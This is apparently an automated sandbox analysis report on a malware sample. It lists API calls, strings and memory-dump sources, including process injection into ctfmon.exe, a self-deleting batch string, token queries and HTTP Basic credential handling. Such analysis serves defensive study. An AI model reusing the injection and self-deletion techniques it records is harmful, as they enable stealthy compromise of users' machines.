lstrlenW.KERNEL32(?), ref: 0282C402

Part of subcall function 02816A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?,?), ref: 02816A43
Part of subcall function 02816A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?), ref: 02816A56

memcpy.MSVCRT ref: 0282C426

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028265F4, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 138

APIs

Part of subcall function 028265A9: StrCmpNIA.SHLWAPI ref: 028265C0

StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 0282675C

Strings

script, xrefs: 02826669 02826693
nbsp;, xrefs: 02826754

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02817058, Relevance: 5.7, APIs: 3, Instructions: 82

APIs

Part of subcall function 0281DCF8: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0281DD10
Part of subcall function 0281DCF8: CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 0281DD24
Part of subcall function 0281DCF8: CloseHandle.KERNEL32 ref: 0281DD37

GetFileSizeEx.KERNEL32(00000000,?), ref: 0281708F

Part of subcall function 0281DD44: UnmapViewOfFile.KERNEL32 ref: 0281DD50
Part of subcall function 0281DD44: MapViewOfFile.KERNEL32(?,00000001,00000000,00000000,00000000), ref: 0281DD67

Part of subcall function 0280E524: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,?), ref: 0280E534

SetEndOfFile.KERNEL32 ref: 02817105
FlushFileBuffers.KERNEL32(?), ref: 02817110

Part of subcall function 0280E348: CloseHandle.KERNEL32 ref: 0280E354

Part of subcall function 0280E56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0280E594

Part of subcall function 02816F3F: GetFileAttributesW.KERNEL32(?), ref: 02816F50
Part of subcall function 02816F3F: PathRemoveFileSpecW.SHLWAPI(?), ref: 02816F85
Part of subcall function 02816F3F: MoveFileExW.KERNEL32(?,?,00000001), ref: 02816FCC
Part of subcall function 02816F3F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 02816FE5
Part of subcall function 02816F3F: Sleep.KERNEL32(00001388), ref: 02817028
Part of subcall function 02816F3F: FlushFileBuffers.KERNEL32 ref: 02817036

Part of subcall function 0281DCB8: UnmapViewOfFile.KERNEL32 ref: 0281DCC4
Part of subcall function 0281DCB8: CloseHandle.KERNEL32 ref: 0281DCD7
Part of subcall function 0281DCB8: CloseHandle.KERNEL32 ref: 0281DCED

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02816B66, Relevance: 5.7, APIs: 2, Instructions: 57

APIs

select.WS2_32(00000000,?,00000000,00000000), ref: 02816BC5
recv.WS2_32(?,?,?,00000000), ref: 02816BD5

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281072F, Relevance: 5.7, APIs: 3, Instructions: 56

APIs

GetCurrentThreadId.KERNEL32 ref: 02810730
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 02810767

Part of subcall function 02810643: memset.MSVCRT ref: 02810654

Part of subcall function 028103FD: GetCurrentProcess.KERNEL32 ref: 02810400
Part of subcall function 028103FD: VirtualProtect.KERNEL32(3D920000,00010000,00000020,?), ref: 02810421
Part of subcall function 028103FD: FlushInstructionCache.KERNEL32(?,3D920000,00010000), ref: 0281042A

ResumeThread.KERNEL32(?), ref: 028107A8

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282589C, Relevance: 5.6, APIs: 3, Instructions: 50

APIs

EnterCriticalSection.KERNEL32(02843510,?,00000001,?,?,02825AB4,?,?,?,00000001), ref: 028258B8
LeaveCriticalSection.KERNEL32(02843510,?,?,02825AB4,?,?,?,00000001), ref: 028258DF

Part of subcall function 0282575A: memset.MSVCRT ref: 02825774
Part of subcall function 0282575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 028257BA

Part of subcall function 02809A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 02809ACA
Part of subcall function 02809A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 02809AEF

Part of subcall function 02809B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 02809B41

_ultow.MSVCRT ref: 02825926

Part of subcall function 02809A2A: CryptDestroyHash.ADVAPI32 ref: 02809A42
Part of subcall function 02809A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 02809A53

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282D7AE, Relevance: 5.6, APIs: 3, Instructions: 47

APIs

CloseHandle.KERNEL32(?), ref: 0282D7BF

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

InternetQueryOptionA.WININET(?,00000015,?,?), ref: 0282D7FF
InternetCloseHandle.WININET(?), ref: 0282D80A

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028245AE, Relevance: 5.6, APIs: 3, Instructions: 44

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 028245D1
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 028245E9
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 02824604

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02833629, Relevance: 5.6, APIs: 3, Instructions: 43

APIs

GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 0283363C
GetLastError.KERNEL32(?,02815032,?,00000008,?,?,?,?,?,?,028249E1,?,?,00000001), ref: 02833646

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 0283366E

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281500E, Relevance: 5.6, APIs: 3, Instructions: 41

APIs

OpenProcessToken.ADVAPI32(?,00000008,?), ref: 02815020

Part of subcall function 02833629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 0283363C
Part of subcall function 02833629: GetLastError.KERNEL32(?,02815032,?,00000008,?,?,?,?,?,?,028249E1,?,?,00000001), ref: 02833646
Part of subcall function 02833629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 0283366E

GetTokenInformation.ADVAPI32(?,0000000C,02842968,00000004,?), ref: 02815048

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

CloseHandle.KERNEL32(?), ref: 0281505E

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02816EFA, Relevance: 5.6, APIs: 3, Instructions: 34

APIs

socket.WS2_32(?,00000002,00000011), ref: 02816F09
bind.WS2_32 ref: 02816F25
closesocket.WS2_32 ref: 02816F30

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280F825, Relevance: 5.6, APIs: 1, Instructions: 19

APIs

InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0280F82D

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02832968, Relevance: 5.6, APIs: 3, Instructions: 17

APIs

shutdown.WS2_32(?,00000002), ref: 02832976
closesocket.WS2_32(?), ref: 0283297F
WSACloseEvent.WS2_32(?), ref: 02832992

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281E22A, Relevance: 5.6, APIs: 3, Instructions: 16

APIs

PathFindFileNameW.SHLWAPI(?), ref: 0281E22E
PathRemoveExtensionW.SHLWAPI(?), ref: 0281E242
CharUpperW.USER32(?,?,?,0281E32B), ref: 0281E24C

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281E4B6, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 81

APIs

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0281E4E9

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

Part of subcall function 0281E22A: PathFindFileNameW.SHLWAPI(?), ref: 0281E22E
Part of subcall function 0281E22A: PathRemoveExtensionW.SHLWAPI(?), ref: 0281E242
Part of subcall function 0281E22A: CharUpperW.USER32(?,?,?,0281E32B), ref: 0281E24C

Part of subcall function 0282100A: RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 0282103A

Sleep.KERNEL32(000001F4), ref: 0281E57E

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 0281E50A

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02809A5B, Relevance: 5.5, APIs: 2, Instructions: 68

APIs

Part of subcall function 028099B5: CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000040), ref: 028099CD

CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 02809ACA
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 02809AEF

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02824159, Relevance: 5.5, APIs: 3, Instructions: 63

APIs

VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 02824188

Part of subcall function 02816A7D: memcpy.MSVCRT ref: 02816A9C

WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 028241C7

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 028241EE

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02825594, Relevance: 5.5, APIs: 3, Instructions: 61

APIs

Part of subcall function 0283537E: HttpQueryInfoA.WININET(?,40000009,?,?,00000000), ref: 028353E5
Part of subcall function 0283537E: memset.MSVCRT ref: 028353FB

GetSystemTime.KERNEL32(?), ref: 028255BA

Part of subcall function 0283046D: EnterCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 0283047A
Part of subcall function 0283046D: LeaveCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 02830488

Sleep.KERNEL32(000005DC), ref: 028255D3
WaitForSingleObject.KERNEL32(?,000005DC), ref: 028255DC

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02818162, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

TlsAlloc.KERNEL32(029927FC,02818636,?,?,?,?,029927F0,?), ref: 0281816B
TlsGetValue.KERNEL32(?,00000001,029927FC), ref: 0281817D
TlsSetValue.KERNEL32(?,?), ref: 028181C2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02811AAE, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 02811ACA
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02811AED
CloseHandle.KERNEL32 ref: 02811AFA

Part of subcall function 0280E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0280E82F
Part of subcall function 0280E826: DeleteFileW.KERNEL32(?), ref: 0280E836

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281DCF8, Relevance: 5.5, APIs: 3, Instructions: 33

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0281DD10
CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 0281DD24
CloseHandle.KERNEL32 ref: 0281DD37

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02833CFF, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 26

APIs

StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 02833D14
lstrcmpA.KERNEL32(Basic ,?,028201C0,00000006,Authorization,?,?,?), ref: 02833D1E

Strings

Basic , xrefs: 02833D13 02833D1D

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281561F, Relevance: 5.4, APIs: 3, Instructions: 24

APIs

memset.MSVCRT ref: 02815639
TlsAlloc.KERNEL32(?,?,?,?,?,?,02811992,?,?,?,?,028248EB,?,?,00000000), ref: 02815642
InitializeCriticalSection.KERNEL32(028427DC), ref: 02815652

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281DCB8, Relevance: 5.4, APIs: 3, Instructions: 21

APIs

UnmapViewOfFile.KERNEL32 ref: 0281DCC4
CloseHandle.KERNEL32 ref: 0281DCD7
CloseHandle.KERNEL32 ref: 0281DCED

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0283042D, Relevance: 5.4, APIs: 3, Instructions: 19

APIs

InitializeCriticalSection.KERNEL32(028430F4), ref: 02830437
QueryPerformanceCounter.KERNEL32(?), ref: 02830441
GetTickCount.KERNEL32 ref: 0283044B

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02833C83, Relevance: 5.3, APIs: 2, Instructions: 26

APIs

StrCmpNIW.SHLWAPI(?,?,00000000), ref: 02833C98
StrCmpIW.SHLWAPI(?,?), ref: 02833CA2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028169B0, Relevance: 5.3, APIs: 1, Instructions: 9

APIs

Part of subcall function 0281692C: EnterCriticalSection.KERNEL32(02843510,00000024,0281699F,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 0281693C
Part of subcall function 0281692C: LeaveCriticalSection.KERNEL32(02843510,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 02816966

HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02812FB7, Relevance: 5.3, APIs: 2, Instructions: 8

APIs

ReleaseMutex.KERNEL32 ref: 02812FBB
CloseHandle.KERNEL32 ref: 02812FC2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02822866, Relevance: 5.2, APIs: 4, Instructions: 191

APIs

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

memcpy.MSVCRT ref: 028229C9
memcpy.MSVCRT ref: 028229DC
memcpy.MSVCRT ref: 028229FD

Part of subcall function 028265F4: StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 0282675C

Part of subcall function 02816A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?,?), ref: 02816A43
Part of subcall function 02816A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?), ref: 02816A56

memcpy.MSVCRT ref: 02822A6F

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 02816A7D: memcpy.MSVCRT ref: 02816A9C

Part of subcall function 028223E2: memmove.MSVCRT ref: 02822653
Part of subcall function 028223E2: memcpy.MSVCRT ref: 02822662

Part of subcall function 028226D6: memcpy.MSVCRT ref: 0282274B
Part of subcall function 028226D6: memmove.MSVCRT ref: 02822811
Part of subcall function 028226D6: memcpy.MSVCRT ref: 02822820

Part of subcall function 0281E61B: strcmp.MSVCRT(?,?,00000009,?,00000007,?,00000008,?,?,?,?,00000000,?,?,?,?), ref: 0281E688

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028169C9, Relevance: 5.1, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000000,?,?,?,02834E9D,02809851,?,?,02834FB1,?,?,?,?,?,?), ref: 02816A06

Part of subcall function 0281692C: EnterCriticalSection.KERNEL32(02843510,00000024,0281699F,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 0281693C
Part of subcall function 0281692C: LeaveCriticalSection.KERNEL32(02843510,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 02816966

HeapAlloc.KERNEL32(00000000,?,?,02834E9D,02809851,?,?,02834FB1,?,?,?,?,?,?,?,?), ref: 028169F3

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0283046D, Relevance: 5.1, APIs: 2, Instructions: 14

APIs

Part of subcall function 028302BE: EnterCriticalSection.KERNEL32(02843510,?,02830474,?,?,0280E3BD,00000000,?,?,00000001), ref: 028302CE
Part of subcall function 028302BE: LeaveCriticalSection.KERNEL32(02843510,?,?,0280E3BD,00000000,?,?,00000001), ref: 028302F8

EnterCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 0283047A
LeaveCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 02830488

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280E826, Relevance: 5.1, APIs: 2, Instructions: 12

APIs

SetFileAttributesW.KERNEL32(?,00000080), ref: 0280E82F
DeleteFileW.KERNEL32(?), ref: 0280E836

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02820D19, Relevance: 5.1, APIs: 2, Instructions: 12

APIs

RegFlushKey.ADVAPI32 ref: 02820D29
RegCloseKey.ADVAPI32 ref: 02820D31

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280D7BE, Relevance: 5.1, APIs: 4, Instructions: 69

APIs

GetLastError.KERNEL32 ref: 0280D810
EnterCriticalSection.KERNEL32 ref: 0280D82D
memcpy.MSVCRT ref: 0280D878
LeaveCriticalSection.KERNEL32(?,?,00000000,00000001), ref: 0280D892

Part of subcall function 0280D6C8: EnterCriticalSection.KERNEL32(?,?,?,?,0280D979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 0280D6D2
Part of subcall function 0280D6C8: memcpy.MSVCRT ref: 0280D74E
Part of subcall function 0280D6C8: memcpy.MSVCRT ref: 0280D762
Part of subcall function 0280D6C8: memcpy.MSVCRT ref: 0280D78C
Part of subcall function 0280D6C8: LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,0280D979,00000001,?,00000000,?,?,?,00000000), ref: 0280D7B2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Analysis Process: ctfmon.exe PID: 1732 Parent PID: 908

Executed Functions

Function 00CD07D0, Relevance: 16.1, APIs: 9, Instructions: 156

APIs

GetCurrentThreadId.KERNEL32 ref: 00CD07D6
memcpy.MSVCRT ref: 00CD0822
memset.MSVCRT ref: 00CD085A
GetThreadContext.KERNEL32(?,?), ref: 00CD0895
SetThreadContext.KERNEL32(?,?), ref: 00CD0900
GetCurrentProcess.KERNEL32 ref: 00CD0919
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00CD093E
FlushInstructionCache.KERNEL32(?,?,0000007C), ref: 00CD0950

Part of subcall function 00CD0643: memset.MSVCRT ref: 00CD0654

Part of subcall function 00CD03FD: GetCurrentProcess.KERNEL32 ref: 00CD0400
Part of subcall function 00CD03FD: VirtualProtect.KERNEL32(3D920000,00010000,00000020,?), ref: 00CD0421
Part of subcall function 00CD03FD: FlushInstructionCache.KERNEL32(?,3D920000,00010000), ref: 00CD042A

ResumeThread.KERNEL32(?), ref: 00CD0992

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CD072F: GetCurrentThreadId.KERNEL32 ref: 00CD0730
Part of subcall function 00CD072F: VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00CD0767
Part of subcall function 00CD072F: ResumeThread.KERNEL32(?), ref: 00CD07A8

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD5BB5, Relevance: 14.8, APIs: 8, Instructions: 67

APIs

EnterCriticalSection.KERNEL32(00F51F44,00F51F38,?,00000001,00CDE48F,00000000,00CDE1B7,00000000,?,00000000,?,00000001,?,00CE4E98,?,00000001), ref: 00CD5BBE
CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CD5BF7
DuplicateHandle.KERNEL32(000000FF,?,000000FF,00CDE48F,00000000,00000000,00000002), ref: 00CD5C16
GetLastError.KERNEL32(?,000000FF,00CDE48F,00000000,00000000,00000002,?,00000001,00CDE48F,00000000,00CDE1B7,00000000,?,00000000,?,00000001), ref: 00CD5C20
TerminateThread.KERNEL32 ref: 00CD5C28
CloseHandle.KERNEL32 ref: 00CD5C2F

Part of subcall function 00CD69C9: HeapAlloc.KERNEL32(00000000,?,?,00CF4E9D,00CC9851,?,?,00CF4FB1,?,?,?,?,?,?,?,?), ref: 00CD69F3
Part of subcall function 00CD69C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00CF4E9D,00CC9851,?,?,00CF4FB1,?,?,?,?,?,?), ref: 00CD6A06

LeaveCriticalSection.KERNEL32(00F51F44,?,00000001,00CDE48F,00000000,00CDE1B7,00000000,?,00000000,?,00000001,?,00CE4E98,?,00000001), ref: 00CD5C44
ResumeThread.KERNEL32 ref: 00CD5C5D

Part of subcall function 00CD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00CD6A43
Part of subcall function 00CD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?), ref: 00CD6A56

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE48F2, Relevance: 14.5, APIs: 5, Strings: 2, Instructions: 121

APIs

GetModuleHandleW.KERNEL32 ref: 00CE4932

Part of subcall function 00CD0FC3: LoadLibraryA.KERNEL32 ref: 00CD1013

Part of subcall function 00CD1791: InitializeCriticalSection.KERNEL32(00D03510), ref: 00CD17B1
Part of subcall function 00CD1791: InitializeCriticalSection.KERNEL32 ref: 00CD17C6
Part of subcall function 00CD1791: memset.MSVCRT ref: 00CD17DB
Part of subcall function 00CD1791: TlsAlloc.KERNEL32(?,00000000,00CE4986,?,?,00000001), ref: 00CD17F2
Part of subcall function 00CD1791: GetModuleHandleW.KERNEL32(?), ref: 00CD1817

WSAStartup.WS2_32(00000202,?), ref: 00CE4998
CreateEventW.KERNEL32(00D02974,00000001), ref: 00CE49BA

Part of subcall function 00CD500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00CD5020
Part of subcall function 00CD500E: GetTokenInformation.ADVAPI32(?,0000000C,00D02968,00000004,?), ref: 00CD5048
Part of subcall function 00CD500E: CloseHandle.KERNEL32(?), ref: 00CD505E

GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 00CE49EC

Part of subcall function 00CE46CB: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00CE470E

GetCurrentProcessId.KERNEL32 ref: 00CE4A17

Part of subcall function 00CE472D: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00CE4777
Part of subcall function 00CE472D: lstrcmpiW.KERNEL32(?,?), ref: 00CE47A6

Part of subcall function 00CE47E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CE4819
Part of subcall function 00CE47E5: lstrcatW.KERNEL32(?,.dat), ref: 00CE4879
Part of subcall function 00CE47E5: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CE489E
Part of subcall function 00CE47E5: ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 00CE48BB
Part of subcall function 00CE47E5: CloseHandle.KERNEL32 ref: 00CE48C8

Part of subcall function 00CE40F3: IsBadReadPtr.KERNEL32 ref: 00CE412C

Strings

GetProcAddress, xrefs: 00CE4941
LoadLibraryA, xrefs: 00CE494D

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE47E5, Relevance: 14.3, APIs: 5, Strings: 2, Instructions: 93

APIs

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CE4819

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

lstrcatW.KERNEL32(?,.dat), ref: 00CE4879
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CE489E
ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 00CE48BB
CloseHandle.KERNEL32 ref: 00CE48C8

Part of subcall function 00CD1905: EnterCriticalSection.KERNEL32(00F51E90,00000000,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD1913
Part of subcall function 00CD1905: GetFileVersionInfoSizeW.VERSION(00F51EF0,?,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD1933
Part of subcall function 00CD1905: GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD1953
Part of subcall function 00CD1905: LeaveCriticalSection.KERNEL32(00F51E90,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD19D2

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00CE483A
.dat, xrefs: 00CE486D

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF358E, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 64

APIs

InitializeSecurityDescriptor.ADVAPI32(00D02980,00000001), ref: 00CF359E
SetSecurityDescriptorDacl.ADVAPI32(00D02980,00000001,00000000,00000000), ref: 00CF35AF
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00CF35C5
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00CF35E1
SetSecurityDescriptorSacl.ADVAPI32(00D02980,?,00000001,?), ref: 00CF35F5
LocalFree.KERNEL32(?), ref: 00CF3607

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 00CF35C0

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD043B, Relevance: 12.6, APIs: 7, Instructions: 173

APIs

memset.MSVCRT ref: 00CD04EB
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00CD04FC
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00CD0530
memset.MSVCRT ref: 00CD0570
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00CD0581
